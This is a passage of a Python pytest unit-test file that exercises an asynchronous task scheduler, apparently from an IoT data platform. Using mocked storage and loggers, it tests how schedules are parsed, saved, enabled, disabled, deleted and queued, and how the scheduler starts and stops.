args0, kwargs0 = log_info.call_args_list[0]
args1, kwargs1 = log_info.call_args_list[1]
args2, kwargs2 = log_info.call_args_list[2]
args3, kwargs3 = log_info.call_args_list[3]
assert 'stats collection' in args0
assert 'COAP listener south' in args1
assert 'OMF to PI north' in args2
# As part of scheduler._get_schedules(), scheduler._schedule_first_task() also gets executed, hence
# "stat collector" appears twice in this list.
assert 'stats collection' in args3
@pytest.mark.asyncio
async def test__get_process_scripts(self, mocker):
# GIVEN
scheduler = Scheduler()
scheduler._storage = MockStorage(core_management_host=None, core_management_port=None)
scheduler._storage_async = MockStorageAsync(core_management_host=None, core_management_port=None)
# WHEN
await scheduler._get_process_scripts()
# THEN
assert len(scheduler._storage_async.scheduled_processes) == len(scheduler._process_scripts)
@pytest.mark.asyncio
async def test__get_process_scripts_exception(self, mocker):
# GIVEN
scheduler = Scheduler()
scheduler._storage = MockStorage(core_management_host=None, core_management_port=None)
scheduler._storage_async = MockStorageAsync(core_management_host=None, core_management_port=None)
log_debug = mocker.patch.object(scheduler._logger, "debug", side_effect=Exception())
log_exception = mocker.patch.object(scheduler._logger, "exception")
# WHEN
# THEN
with pytest.raises(Exception):
await scheduler._get_process_scripts()
log_args = 'Query failed: %s', 'scheduled_processes'
log_exception.assert_called_once_with(*log_args)
@pytest.mark.asyncio
@pytest.mark.parametrize("test_interval, is_exception", [
('"Blah" 0 days', True),
('12:30:11', False),
('0 day 12:30:11', False),
('1 day 12:40:11', False),
('2 days', True),
('2 days 00:00:59', False),
('00:25:61', True)
])
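# NOTE (editor): the interval strings above follow the '[D day[s]] HH:MM:SS'
# form the scheduler parses; cases with a non-numeric prefix, a missing time
# component, or out-of-range seconds are expected to raise.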
async def test__get_schedules(self, test_interval, is_exception, mocker):
# GIVEN
scheduler = Scheduler()
scheduler._storage = MockStorage(core_management_host=None, core_management_port=None)
scheduler._storage_async = MockStorageAsync(core_management_host=None, core_management_port=None)
mocker.patch.object(scheduler, '_schedule_first_task')
log_exception = mocker.patch.object(scheduler._logger, "exception")
new_schedules = copy.deepcopy(MockStorageAsync.schedules)
new_schedules[5]['schedule_interval'] = test_interval
mocker.patch.object(MockStorageAsync, 'schedules', new_schedules)
# WHEN
# THEN
if is_exception is True:
with pytest.raises(Exception):
await scheduler._get_schedules()
assert 1 == log_exception.call_count
else:
await scheduler._get_schedules()
assert len(scheduler._storage_async.schedules) == len(scheduler._schedules)
@pytest.mark.asyncio
async def test__get_schedules_exception(self, mocker):
# GIVEN
scheduler = Scheduler()
scheduler._storage = MockStorage(core_management_host=None, core_management_port=None)
scheduler._storage_async = MockStorageAsync(core_management_host=None, core_management_port=None)
log_debug = mocker.patch.object(scheduler._logger, "debug", side_effect=Exception())
log_exception = mocker.patch.object(scheduler._logger, "exception")
mocker.patch.object(scheduler, '_schedule_first_task', side_effect=Exception())
# WHEN
# THEN
with pytest.raises(Exception):
await scheduler._get_schedules()
log_args = 'Query failed: %s', 'schedules'
log_exception.assert_called_once_with(*log_args)
@pytest.mark.asyncio
async def test__read_storage(self, mocker):
# GIVEN
scheduler = Scheduler()
scheduler._storage = MockStorage(core_management_host=None, core_management_port=None)
scheduler._storage_async = MockStorageAsync(core_management_host=None, core_management_port=None)
mocker.patch.object(scheduler, '_schedule_first_task')
# WHEN
await scheduler._read_storage()
# THEN
assert len(scheduler._storage_async.scheduled_processes) == len(scheduler._process_scripts)
assert len(scheduler._storage_async.schedules) == len(scheduler._schedules)
@pytest.mark.asyncio
@pytest.mark.skip("_mark_tasks_interrupted() not implemented in main Scheduler class.")
async def test__mark_tasks_interrupted(self, mocker):
pass
@pytest.mark.asyncio
async def test__read_config(self, mocker):
async def get_cat():
return {
"max_running_tasks": {
"description": "The maximum number of tasks that can be running at any given time",
"type": "integer",
"default": str(Scheduler._DEFAULT_MAX_RUNNING_TASKS),
"value": str(Scheduler._DEFAULT_MAX_RUNNING_TASKS)
},
"max_completed_task_age_days": {
"description": "The maximum age, in days (based on the start time), for a rows "
"in the tasks table that do not have a status of running",
"type": "integer",
"default": str(Scheduler._DEFAULT_MAX_COMPLETED_TASK_AGE_DAYS),
"value": str(Scheduler._DEFAULT_MAX_COMPLETED_TASK_AGE_DAYS)
},
}
# Changed in version 3.8: patch() now returns an AsyncMock if the target is an async function.
if sys.version_info.major == 3 and sys.version_info.minor >= 8:
_rv = await get_cat()
else:
_rv = asyncio.ensure_future(get_cat())
# GIVEN
scheduler = Scheduler()
scheduler._storage = MockStorage(core_management_host=None, core_management_port=None)
scheduler._storage_async = MockStorageAsync(core_management_host=None, core_management_port=None)
cr_cat = mocker.patch.object(ConfigurationManager, "create_category", return_value=asyncio.ensure_future(mock_task()))
get_cat = mocker.patch.object(ConfigurationManager, "get_category_all_items", return_value=_rv)
# WHEN
assert scheduler._max_running_tasks is None
assert scheduler._max_completed_task_age is None
await scheduler._read_config()
# THEN
assert 1 == cr_cat.call_count
assert 1 == get_cat.call_count
assert scheduler._max_running_tasks is not None
assert scheduler._max_completed_task_age is not None
@pytest.mark.asyncio
async def test_start(self, mocker):
# TODO: Mandatory - Add negative tests for full code coverage
# GIVEN
scheduler = Scheduler()
scheduler._storage = MockStorage(core_management_host=None, core_management_port=None)
scheduler._storage_async = MockStorageAsync(core_management_host=None, core_management_port=None)
log_debug = mocker.patch.object(scheduler._logger, "debug")
log_info = mocker.patch.object(scheduler._logger, "info")
current_time = time.time()
mocker.patch.object(scheduler, '_schedule_first_task')
mocker.patch.object(scheduler, '_scheduler_loop', return_value=asyncio.ensure_future(mock_task()))
mocker.patch.multiple(scheduler, _core_management_port=9999,
_core_management_host="0.0.0.0",
current_time=current_time - 3600)
# TODO: Remove after implementation of above test test__read_config()
mocker.patch.object(scheduler, '_read_config', return_value=asyncio.ensure_future(mock_task()))
assert scheduler._ready is False
# WHEN
await scheduler.start()
# THEN
assert scheduler._ready is True
assert len(scheduler._storage_async.scheduled_processes) == len(scheduler._process_scripts)
assert len(scheduler._storage_async.schedules) == len(scheduler._schedules)
calls = [call('Starting'),
call('Starting Scheduler: Management port received is %d', 9999)]
log_info.assert_has_calls(calls, any_order=True)
calls = [call('Database command: %s', 'scheduled_processes'),
call('Database command: %s', 'schedules')]
log_debug.assert_has_calls(calls, any_order=True)
@pytest.mark.asyncio
async def test_stop(self, mocker):
# TODO: Mandatory - Add negative tests for full code coverage
# GIVEN
scheduler = Scheduler()
scheduler._storage = MockStorage(core_management_host=None, core_management_port=None)
scheduler._storage_async = MockStorageAsync(core_management_host=None, core_management_port=None)
log_info = mocker.patch.object(scheduler._logger, "info")
log_exception = mocker.patch.object(scheduler._logger, "exception")
mocker.patch.object(scheduler, '_scheduler_loop', return_value=asyncio.ensure_future(mock_task()))
mocker.patch.object(scheduler, '_resume_check_schedules', return_value=asyncio.ensure_future(mock_task()))
mocker.patch.object(scheduler, '_purge_tasks_task', return_value=asyncio.ensure_future(asyncio.sleep(.1)))
mocker.patch.object(scheduler, '_scheduler_loop_task', return_value=asyncio.ensure_future(asyncio.sleep(.1)))
current_time = time.time()
mocker.patch.multiple(scheduler, _core_management_port=9999,
_core_management_host="0.0.0.0",
_start_time=current_time - 3600,
_paused=False,
_task_processes={})
# WHEN
retval = await scheduler.stop()
# THEN
assert retval is True
assert scheduler._schedule_executions is None
assert scheduler._task_processes is None
assert scheduler._schedules is None
assert scheduler._process_scripts is None
assert scheduler._ready is False
assert scheduler._paused is False
assert scheduler._start_time is None
calls = [call('Processing stop request'), call('Stopped')]
log_info.assert_has_calls(calls, any_order=True)
# TODO: Find why these exceptions are being raised despite mocking _purge_tasks_task, _scheduler_loop_task
calls = [call('An exception was raised by Scheduler._purge_tasks %s', "object MagicMock can't be used in 'await' expression"),
call('An exception was raised by Scheduler._scheduler_loop %s', "object MagicMock can't be used in 'await' expression")]
log_exception.assert_has_calls(calls)
@pytest.mark.asyncio
async def test_get_scheduled_processes(self, mocker):
# GIVEN
scheduler = Scheduler()
scheduler._storage = MockStorage(core_management_host=None, core_management_port=None)
scheduler._storage_async = MockStorageAsync(core_management_host=None, core_management_port=None)
await scheduler._get_process_scripts()
mocker.patch.object(scheduler, '_ready', True)
# WHEN
processes = await scheduler.get_scheduled_processes()
# THEN
assert len(scheduler._storage_async.scheduled_processes) == len(processes)
@pytest.mark.asyncio
async def test_schedule_row_to_schedule(self, mocker):
# GIVEN
scheduler = Scheduler()
schedule_id = uuid.uuid4()
schedule_row = scheduler._ScheduleRow(
id=schedule_id,
name='Test Schedule',
type=Schedule.Type.INTERVAL,
day=0,
time=0,
repeat=10,
repeat_seconds=10,
exclusive=False,
enabled=True,
process_name='TestProcess')
# WHEN
schedule = scheduler._schedule_row_to_schedule(schedule_id, schedule_row)
# THEN
assert isinstance(schedule, Schedule)
assert schedule.schedule_id == schedule_row[0]
assert schedule.name == schedule_row[1]
assert schedule.schedule_type == schedule_row[2]
assert schedule_row[3] == 0 # 0 for Interval Schedule
assert schedule_row[4] == 0 # 0 for Interval Schedule
assert schedule.repeat == schedule_row[5]
assert schedule.exclusive == schedule_row[7]
assert schedule.enabled == schedule_row[8]
assert schedule.process_name == schedule_row[9]
@pytest.mark.asyncio
async def test_get_schedules(self, mocker):
# GIVEN
scheduler, schedule, log_info, log_exception, log_error, log_debug = await self.scheduler_fixture(mocker)
# WHEN
schedules = await scheduler.get_schedules()
# THEN
assert len(scheduler._storage_async.schedules) == len(schedules)
@pytest.mark.asyncio
async def test_get_schedule(self, mocker):
# GIVEN
scheduler, schedule, log_info, log_exception, log_error, log_debug = await self.scheduler_fixture(mocker)
schedule_id = uuid.UUID("cea17db8-6ccc-11e7-907b-a6006ad3dba0") # purge schedule
# WHEN
schedule = await scheduler.get_schedule(schedule_id)
# THEN
assert isinstance(schedule, Schedule)
assert schedule.schedule_id == schedule_id
assert schedule.name == "purge"
assert schedule.schedule_type == Schedule.Type.MANUAL
assert schedule.repeat == datetime.timedelta(0, 3600)
assert schedule.exclusive is True
assert schedule.enabled is True
assert schedule.process_name == "purge"
@pytest.mark.asyncio
async def test_get_schedule_exception(self, mocker):
# GIVEN
scheduler, schedule, log_info, log_exception, log_error, log_debug = await self.scheduler_fixture(mocker)
schedule_id = uuid.uuid4()
# WHEN
# THEN
with pytest.raises(ScheduleNotFoundError):
schedule = await scheduler.get_schedule(schedule_id)
@pytest.mark.asyncio
async def test_save_schedule_new(self, mocker):
        async def mock_coro():
            return ""
# GIVEN
scheduler, schedule, log_info, log_exception, log_error, log_debug = await self.scheduler_fixture(mocker)
audit_logger = mocker.patch.object(AuditLogger, 'information', return_value=asyncio.ensure_future(mock_task()))
first_task = mocker.patch.object(scheduler, '_schedule_first_task')
resume_sch = mocker.patch.object(scheduler, '_resume_check_schedules')
log_info = mocker.patch.object(scheduler._logger, "info")
enable_schedule = mocker.patch.object(scheduler, "enable_schedule", return_value=mock_coro())
disable_schedule = mocker.patch.object(scheduler, "disable_schedule", return_value=mock_coro())
schedule_id = uuid.uuid4()
schedule_row = scheduler._ScheduleRow(
id=schedule_id,
name='Test Schedule',
type=Schedule.Type.INTERVAL,
day=0,
time=0,
repeat=datetime.timedelta(seconds=30),
repeat_seconds=30,
exclusive=False,
enabled=True,
process_name='TestProcess')
schedule = scheduler._schedule_row_to_schedule(schedule_id, schedule_row)
# WHEN
await scheduler.save_schedule(schedule)
# THEN
assert len(scheduler._storage_async.schedules) + 1 == len(scheduler._schedules)
assert 1 == audit_logger.call_count
        calls = [call('SCHAD', {'schedule': {'name': 'Test Schedule', 'processName': 'TestProcess',
'type': Schedule.Type.INTERVAL, 'repeat': 30.0, 'enabled': True,
'exclusive': False}})]
audit_logger.assert_has_calls(calls, any_order=True)
assert 1 == first_task.call_count
assert 1 == resume_sch.call_count
assert 0 == enable_schedule.call_count
assert 0 == disable_schedule.call_count
@pytest.mark.asyncio
async def test_save_schedule_new_with_enable_modified(self, mocker):
        async def mock_coro():
            return ""
# GIVEN
scheduler, schedule, log_info, log_exception, log_error, log_debug = await self.scheduler_fixture(mocker)
audit_logger = mocker.patch.object(AuditLogger, 'information', return_value=asyncio.ensure_future(mock_task()))
first_task = mocker.patch.object(scheduler, '_schedule_first_task')
resume_sch = mocker.patch.object(scheduler, '_resume_check_schedules')
log_info = mocker.patch.object(scheduler._logger, "info")
enable_schedule = mocker.patch.object(scheduler, "enable_schedule", return_value=mock_coro())
disable_schedule = mocker.patch.object(scheduler, "disable_schedule", return_value=mock_coro())
schedule_id = uuid.uuid4()
schedule_row = scheduler._ScheduleRow(
id=schedule_id,
name='Test Schedule',
type=Schedule.Type.INTERVAL,
day=0,
time=0,
repeat=datetime.timedelta(seconds=30),
repeat_seconds=30,
exclusive=False,
enabled=True,
process_name='TestProcess')
schedule = scheduler._schedule_row_to_schedule(schedule_id, schedule_row)
# WHEN
await scheduler.save_schedule(schedule, is_enabled_modified=True)
# THEN
assert len(scheduler._storage_async.schedules) + 1 == len(scheduler._schedules)
assert 1 == audit_logger.call_count
        calls = [call('SCHAD', {'schedule': {'name': 'Test Schedule', 'processName': 'TestProcess',
'type': Schedule.Type.INTERVAL, 'repeat': 30.0, 'enabled': True,
'exclusive': False}})]
audit_logger.assert_has_calls(calls, any_order=True)
assert 1 == first_task.call_count
assert 1 == resume_sch.call_count
assert 1 == enable_schedule.call_count
assert 0 == disable_schedule.call_count
# WHEN
await scheduler.save_schedule(schedule, is_enabled_modified=False)
# THEN
assert 1 == disable_schedule.call_count
@pytest.mark.asyncio
async def test_save_schedule_update(self, mocker):
        async def mock_coro():
            return ""
# GIVEN
scheduler, schedule, log_info, log_exception, log_error, log_debug = await self.scheduler_fixture(mocker)
audit_logger = mocker.patch.object(AuditLogger, 'information', return_value=asyncio.ensure_future(mock_task()))
first_task = mocker.patch.object(scheduler, '_schedule_first_task')
resume_sch = mocker.patch.object(scheduler, '_resume_check_schedules')
log_info = mocker.patch.object(scheduler._logger, "info")
schedule_id = uuid.UUID("2b614d26-760f-11e7-b5a5-be2e44b06b34") # OMF to PI North
schedule_row = scheduler._ScheduleRow(
id=schedule_id,
name='Test Schedule',
type=Schedule.Type.TIMED,
day=1,
time=datetime.time(),
repeat=datetime.timedelta(seconds=30),
repeat_seconds=30,
exclusive=False,
enabled=True,
process_name='TestProcess')
schedule = scheduler._schedule_row_to_schedule(schedule_id, schedule_row)
enable_schedule = mocker.patch.object(scheduler, "enable_schedule", return_value=mock_coro())
disable_schedule = mocker.patch.object(scheduler, "disable_schedule", return_value=mock_coro())
# WHEN
await scheduler.save_schedule(schedule)
# THEN
assert len(scheduler._storage_async.schedules) == len(scheduler._schedules)
assert 1 == audit_logger.call_count
calls = [call('SCHCH', {'schedule': {'name': 'Test Schedule', 'enabled': True, 'repeat': 30.0,
'exclusive': False, 'day': 1, 'time': '0:0:0',
'processName': 'TestProcess', 'type': Schedule.Type.TIMED}})]
audit_logger.assert_has_calls(calls, any_order=True)
assert 1 == first_task.call_count
assert 1 == resume_sch.call_count
assert 0 == enable_schedule.call_count
assert 0 == disable_schedule.call_count
@pytest.mark.asyncio
async def test_save_schedule_update_with_enable_modified(self, mocker):
        async def mock_coro():
            return ""
# GIVEN
scheduler, schedule, log_info, log_exception, log_error, log_debug = await self.scheduler_fixture(mocker)
audit_logger = mocker.patch.object(AuditLogger, 'information', return_value=asyncio.ensure_future(mock_task()))
first_task = mocker.patch.object(scheduler, '_schedule_first_task')
resume_sch = mocker.patch.object(scheduler, '_resume_check_schedules')
log_info = mocker.patch.object(scheduler._logger, "info")
schedule_id = uuid.UUID("2b614d26-760f-11e7-b5a5-be2e44b06b34") # OMF to PI North
schedule_row = scheduler._ScheduleRow(
id=schedule_id,
name='Test Schedule',
type=Schedule.Type.TIMED,
day=1,
time=datetime.time(),
repeat=datetime.timedelta(seconds=30),
repeat_seconds=30,
exclusive=False,
enabled=True,
process_name='TestProcess')
schedule = scheduler._schedule_row_to_schedule(schedule_id, schedule_row)
enable_schedule = mocker.patch.object(scheduler, "enable_schedule", return_value=mock_coro())
disable_schedule = mocker.patch.object(scheduler, "disable_schedule", return_value=mock_coro())
# WHEN
await scheduler.save_schedule(schedule, is_enabled_modified=True)
# THEN
assert len(scheduler._storage_async.schedules) == len(scheduler._schedules)
assert 1 == audit_logger.call_count
calls = [call('SCHCH', {'schedule': {'name': 'Test Schedule', 'enabled': True, 'repeat': 30.0,
'exclusive': False, 'day': 1, 'time': '0:0:0',
'processName': 'TestProcess', 'type': Schedule.Type.TIMED}})]
audit_logger.assert_has_calls(calls, any_order=True)
assert 1 == first_task.call_count
assert 1 == resume_sch.call_count
assert 1 == enable_schedule.call_count
assert 0 == disable_schedule.call_count
# WHEN
await scheduler.save_schedule(schedule, is_enabled_modified=False)
# THEN
assert 1 == disable_schedule.call_count
@pytest.mark.asyncio
async def test_save_schedule_exception(self, mocker):
# GIVEN
scheduler, schedule, log_info, log_exception, log_error, log_debug = await self.scheduler_fixture(mocker)
schedule_id = uuid.uuid4()
schedule_row = scheduler._ScheduleRow(
id=schedule_id,
name='Test Schedule',
type=Schedule.Type.TIMED,
day=0,
time=0,
repeat=datetime.timedelta(seconds=30),
repeat_seconds=30,
exclusive=False,
enabled=True,
process_name='TestProcess')
# WHEN
# THEN
with pytest.raises(ValueError) as ex:
temp_schedule = scheduler._schedule_row_to_schedule(schedule_id, schedule_row)
temp_schedule.name = None
await scheduler.save_schedule(temp_schedule)
del temp_schedule
assert str(ex).endswith("name can not be empty")
with pytest.raises(ValueError) as ex:
temp_schedule = scheduler._schedule_row_to_schedule(schedule_id, schedule_row)
temp_schedule.name = ""
await scheduler.save_schedule(temp_schedule)
del temp_schedule
assert str(ex).endswith("name can not be empty")
with pytest.raises(ValueError) as ex:
temp_schedule = scheduler._schedule_row_to_schedule(schedule_id, schedule_row)
temp_schedule.repeat = 1234
await scheduler.save_schedule(temp_schedule)
del temp_schedule
assert str(ex).endswith('repeat must be of type datetime.timedelta')
with pytest.raises(ValueError) as ex:
temp_schedule = scheduler._schedule_row_to_schedule(schedule_id, schedule_row)
temp_schedule.exclusive = None
await scheduler.save_schedule(temp_schedule)
del temp_schedule
assert str(ex).endswith('exclusive can not be None')
with pytest.raises(ValueError) as ex:
temp_schedule = scheduler._schedule_row_to_schedule(schedule_id, schedule_row)
temp_schedule.time = 1234
await scheduler.save_schedule(temp_schedule)
del temp_schedule
assert str(ex).endswith('time must be of type datetime.time')
with pytest.raises(ValueError) as ex:
temp_schedule = scheduler._schedule_row_to_schedule(schedule_id, schedule_row)
temp_schedule.day = 0
temp_schedule.time = datetime.time()
await scheduler.save_schedule(temp_schedule)
del temp_schedule
assert str(ex).endswith('day must be between 1 and 7')
@pytest.mark.asyncio
@pytest.mark.skip(reason="To be done")
async def test_remove_service_from_task_processes(self):
pass
@pytest.mark.asyncio
async def test_disable_schedule(self, mocker):
# GIVEN
scheduler = Scheduler()
scheduler._storage = MockStorage(core_management_host=None, core_management_port=None)
scheduler._storage_async = MockStorageAsync(core_management_host=None, core_management_port=None)
mocker.patch.object(scheduler, '_schedule_first_task')
await scheduler._get_schedules()
mocker.patch.object(scheduler, '_ready', True)
mocker.patch.object(scheduler, '_task_processes')
audit_logger = mocker.patch.object(AuditLogger, 'information', return_value=asyncio.ensure_future(mock_task()))
log_info = mocker.patch.object(scheduler._logger, "info")
sch_id = uuid.UUID("2b614d26-760f-11e7-b5a5-be2e44b06b34") # OMF to PI North
# WHEN
status, message = await scheduler.disable_schedule(sch_id)
# THEN
assert status is True
assert message == "Schedule successfully disabled"
assert (scheduler._schedules[sch_id]).id == sch_id
assert (scheduler._schedules[sch_id]).enabled is False
assert 2 == log_info.call_count
calls = [call('No Task running for Schedule %s', '2b614d26-760f-11e7-b5a5-be2e44b06b34'),
call("Disabled Schedule '%s/%s' process '%s'\n", 'OMF to PI north',
'2b614d26-760f-11e7-b5a5-be2e44b06b34', 'North Readings to PI')]
log_info.assert_has_calls(calls)
assert 1 == audit_logger.call_count
calls = [call('SCHCH', {'schedule': {'name': 'OMF to PI north', 'repeat': 30.0, 'enabled': False,
'type': Schedule.Type.INTERVAL, 'exclusive': True,
'processName': 'North Readings to PI'}})]
audit_logger.assert_has_calls(calls, any_order=True)
@pytest.mark.asyncio
async def test_disable_schedule_wrong_schedule_id(self, mocker):
# GIVEN
scheduler = Scheduler()
scheduler._storage = MockStorage(core_management_host=None, core_management_port=None)
scheduler._storage_async = MockStorageAsync(core_management_host=None, core_management_port=None)
mocker.patch.object(scheduler, '_schedule_first_task')
await scheduler._get_schedules()
mocker.patch.object(scheduler, '_ready', True)
mocker.patch.object(scheduler, '_task_processes')
log_exception = mocker.patch.object(scheduler._logger, "exception")
random_schedule_id = uuid.uuid4()
# WHEN
await scheduler.disable_schedule(random_schedule_id)
# THEN
log_params = "No such Schedule %s", str(random_schedule_id)
log_exception.assert_called_with(*log_params)
@pytest.mark.asyncio
async def test_disable_schedule_already_disabled(self, mocker):
# GIVEN
scheduler = Scheduler()
scheduler._storage = MockStorage(core_management_host=None, core_management_port=None)
scheduler._storage_async = MockStorageAsync(core_management_host=None, core_management_port=None)
mocker.patch.object(scheduler, '_schedule_first_task')
await scheduler._get_schedules()
mocker.patch.object(scheduler, '_ready', True)
mocker.patch.object(scheduler, '_task_processes')
log_info = mocker.patch.object(scheduler._logger, "info")
sch_id = uuid.UUID("d1631422-9ec6-11e7-abc4-cec278b6b50a") # backup
# WHEN
status, message = await scheduler.disable_schedule(sch_id)
# THEN
assert status is True
assert message == "Schedule {} already disabled".format(str(sch_id))
assert (scheduler._schedules[sch_id]).id == sch_id
assert (scheduler._schedules[sch_id]).enabled is False
log_params = "Schedule %s already disabled", str(sch_id)
log_info.assert_called_with(*log_params)
@pytest.mark.asyncio
async def test_enable_schedule(self, mocker):
# GIVEN
scheduler, schedule, log_info, log_exception, log_error, log_debug = await self.scheduler_fixture(mocker)
sch_id = uuid.UUID("d1631422-9ec6-11e7-abc4-cec278b6b50a") # backup
queue_task = mocker.patch.object(scheduler, 'queue_task', return_value=asyncio.ensure_future(mock_task()))
audit_logger = mocker.patch.object(AuditLogger, 'information', return_value=asyncio.ensure_future(mock_task()))
# WHEN
status, message = await scheduler.enable_schedule(sch_id)
# THEN
assert status is True
assert message == "Schedule successfully enabled"
assert (scheduler._schedules[sch_id]).id == sch_id
assert (scheduler._schedules[sch_id]).enabled is True
assert 1 == queue_task.call_count
calls = [call("Enabled Schedule '%s/%s' process '%s'\n", 'backup hourly', 'd1631422-9ec6-11e7-abc4-cec278b6b50a', 'backup')]
log_info.assert_has_calls(calls, any_order=True)
assert 1 == audit_logger.call_count
calls = [call('SCHCH', {'schedule': {'name': 'backup hourly', 'type': Schedule.Type.INTERVAL, 'processName': 'backup', 'exclusive': True, 'repeat': 3600.0, 'enabled': True}})]
audit_logger.assert_has_calls(calls, any_order=True)
@pytest.mark.asyncio
async def test_enable_schedule_already_enabled(self, mocker):
# GIVEN
scheduler, schedule, log_info, log_exception, log_error, log_debug = await self.scheduler_fixture(mocker)
sch_id = uuid.UUID("ada12840-68d3-11e7-907b-a6006ad3dba0") #Coap
mocker.patch.object(scheduler, 'queue_task', return_value=asyncio.ensure_future(mock_task()))
# WHEN
status, message = await scheduler.enable_schedule(sch_id)
# THEN
assert status is True
assert message == "Schedule is already enabled"
assert (scheduler._schedules[sch_id]).id == sch_id
assert (scheduler._schedules[sch_id]).enabled is True
log_params = "Schedule %s already enabled", str(sch_id)
log_info.assert_called_with(*log_params)
@pytest.mark.asyncio
async def test_enable_schedule_wrong_schedule_id(self, mocker):
# GIVEN
scheduler, schedule, log_info, log_exception, log_error, log_debug = await self.scheduler_fixture(mocker)
random_schedule_id = uuid.uuid4()
# WHEN
await scheduler.enable_schedule(random_schedule_id)
# THEN
log_params = "No such Schedule %s", str(random_schedule_id)
log_exception.assert_called_with(*log_params)
@pytest.mark.asyncio
async def test_queue_task(self, mocker):
# GIVEN
scheduler = Scheduler()
scheduler._storage = MockStorage(core_management_host=None, core_management_port=None)
scheduler._storage_async = MockStorageAsync(core_management_host=None, core_management_port=None)
mocker.patch.object(scheduler, '_schedule_first_task')
# log_info = mocker.patch.object(scheduler._logger, "info")
await scheduler._get_schedules()
sch_id = uuid.UUID("cea17db8-6ccc-11e7-907b-a6006ad3dba0") # backup
mocker.patch.object(scheduler, '_ready', True)
mocker.patch.object(scheduler, '_resume_check_schedules')
# Assert that there is no task queued for this schedule at first
with pytest.raises(KeyError) as excinfo:
assert scheduler._schedule_executions[sch_id] is True
# WHEN
await scheduler.queue_task(sch_id)
# THEN
assert isinstance(scheduler._schedule_executions[sch_id], scheduler._ScheduleExecution)
# log_params = "Queued schedule '%s' for execution", 'purge'
# log_info.assert_called_with(*log_params)
@pytest.mark.asyncio
async def test_queue_task_schedule_not_found(self, mocker):
# GIVEN
scheduler = Scheduler()
scheduler._storage = MockStorage(core_management_host=None, core_management_port=None)
scheduler._storage_async = MockStorageAsync(core_management_host=None, core_management_port=None)
mocker.patch.object(scheduler, '_schedule_first_task')
mocker.patch.object(scheduler, '_ready', True)
mocker.patch.object(scheduler, '_resume_check_schedules')
# WHEN
# THEN
with pytest.raises(ScheduleNotFoundError) as excinfo:
await scheduler.queue_task(uuid.uuid4())
@pytest.mark.asyncio
async def test_delete_schedule(self, mocker):
# GIVEN
scheduler, schedule, log_info, log_exception, log_error, log_debug = await self.scheduler_fixture(mocker)
sch_id = uuid.UUID("d1631422-9ec6-11e7-abc4-cec278b6b50a") # backup
await scheduler._get_schedules()
# Confirm no. of schedules
assert len(scheduler._storage_async.schedules) == len(scheduler._schedules)
mocker.patch.object(scheduler, '_ready', True)
# WHEN
# Now delete schedule
await scheduler.delete_schedule(sch_id)
# THEN
# Now confirm there is one schedule less
assert len(scheduler._storage_async.schedules) - 1 == len(scheduler._schedules)
@pytest.mark.asyncio
async def test_delete_schedule_enabled_schedule(self, mocker):
# GIVEN
scheduler, schedule, log_info, log_exception, log_error, log_debug = await self.scheduler_fixture(mocker)
sch_id = uuid.UUID("ada12840-68d3-11e7-907b-a6006ad3dba0") #Coap
await scheduler._get_schedules()
mocker.patch.object(scheduler, '_ready', True)
        # Confirm the schedule count matches the mock storage (nothing deleted yet)
assert len(scheduler._storage_async.schedules) == len(scheduler._schedules)
# WHEN
# Now delete schedule
with pytest.raises(RuntimeWarning):
await scheduler.delete_schedule(sch_id)
# THEN
# Now confirm no schedule is deleted
assert len(scheduler._storage_async.schedules) == len(scheduler._schedules)
assert 1 == log_exception.call_count
log_params = 'Attempt to delete an enabled Schedule %s. Not deleted.', str(sch_id)
log_exception.assert_called_with(*log_params)
@pytest.mark.asyncio
async def test_delete_schedule_exception(self, mocker):
# GIVEN
scheduler, schedule, log_info, log_exception, log_error, log_debug = await self.scheduler_fixture(mocker)
log_debug = mocker.patch.object(scheduler._logger, 'debug', side_effect=Exception())
sch_id = uuid.UUID("d1631422-9ec6-11e7-abc4-cec278b6b50a") # backup
# WHEN
# THEN
with pytest.raises(ScheduleNotFoundError) as excinfo:
await scheduler.delete_schedule(uuid.uuid4())
@pytest.mark.asyncio
async def test_delete_schedule_not_found(self, mocker):
# GIVEN
scheduler, schedule, log_info, log_exception, log_error, log_debug = await self.scheduler_fixture(mocker)
# WHEN
# THEN
with pytest.raises(ScheduleNotFoundError) as excinfo:
await scheduler.delete_schedule(uuid.uuid4())
@pytest.mark.asyncio
async def test_get_running_tasks(self, mocker):
# GIVEN
scheduler, schedule, log_info, log_exception, log_error, log_debug = await self.scheduler_fixture(mocker)
# Assert that there is no task queued for schedule
with pytest.raises(KeyError) as excinfo:
assert scheduler._schedule_executions[schedule.id] is True
# Now queue task and assert that the task has been queued
await scheduler.queue_task(schedule.id)
assert isinstance(scheduler._schedule_executions[schedule.id], scheduler._ScheduleExecution)
# Confirm that no task has started yet
assert 0 == len(scheduler._schedule_executions[schedule.id].task_processes)
await scheduler._start_task(schedule)
# Confirm that task has started
assert 1 == len(scheduler._schedule_executions[schedule.id].task_processes)
# WHEN
tasks = await scheduler.get_running_tasks()
# THEN
assert 1 == len(tasks)
assert schedule.process_name == tasks[0].process_name
assert tasks[0].reason is None
assert tasks[0].state == Task.State.RUNNING
assert tasks[0].cancel_requested is None
assert tasks[0].start_time is not None
assert tasks[0].end_time is None
assert tasks[0].exit_code is None
@pytest.mark.asyncio
async def test_get_task(self, mocker):
# GIVEN
scheduler, schedule, log_info, log_exception, log_error, log_debug = await self.scheduler_fixture(mocker)
# Assert that there is no North task queued for schedule
with pytest.raises(KeyError) as excinfo:
assert scheduler._schedule_executions[schedule.id] is True
# Now queue task and assert that the North task has been queued
await scheduler.queue_task(schedule.id)
assert isinstance(scheduler._schedule_executions[schedule.id], scheduler._ScheduleExecution)
# Confirm that no task has started yet
assert 0 == len(scheduler._schedule_executions[schedule.id].task_processes)
await scheduler._start_task(schedule)
# Confirm that task has started
assert 1 == len(scheduler._schedule_executions[schedule.id].task_processes)
task_id = list(scheduler._schedule_executions[schedule.id].task_processes.keys())[0]
# WHEN
task = await scheduler.get_task(task_id)
# THEN
assert schedule.process_name == task.process_name
        assert task.reason == ''
assert task.state is not None
assert task.cancel_requested is None
assert task.start_time is not None
assert task.end_time is not None
        assert task.exit_code == '0'
@pytest.mark.skip("Need a suitable fixture")
@pytest.mark.asyncio
async def test_get_task_not_found(self, mocker):
# GIVEN
scheduler, schedule, log_info, log_exception, log_error, log_debug = await self.scheduler_fixture(mocker)
# WHEN
# THEN
with pytest.raises(TaskNotFoundError) as excinfo:
tasks = await scheduler.get_task(uuid.uuid4())
@pytest.mark.asyncio
async def test_get_task_exception(self, mocker):
# GIVEN
scheduler, schedule, log_info, log_exception, log_error, log_debug = await self.scheduler_fixture(mocker)
log_debug = mocker.patch.object(scheduler._logger, 'debug', side_effect=Exception())
# WHEN
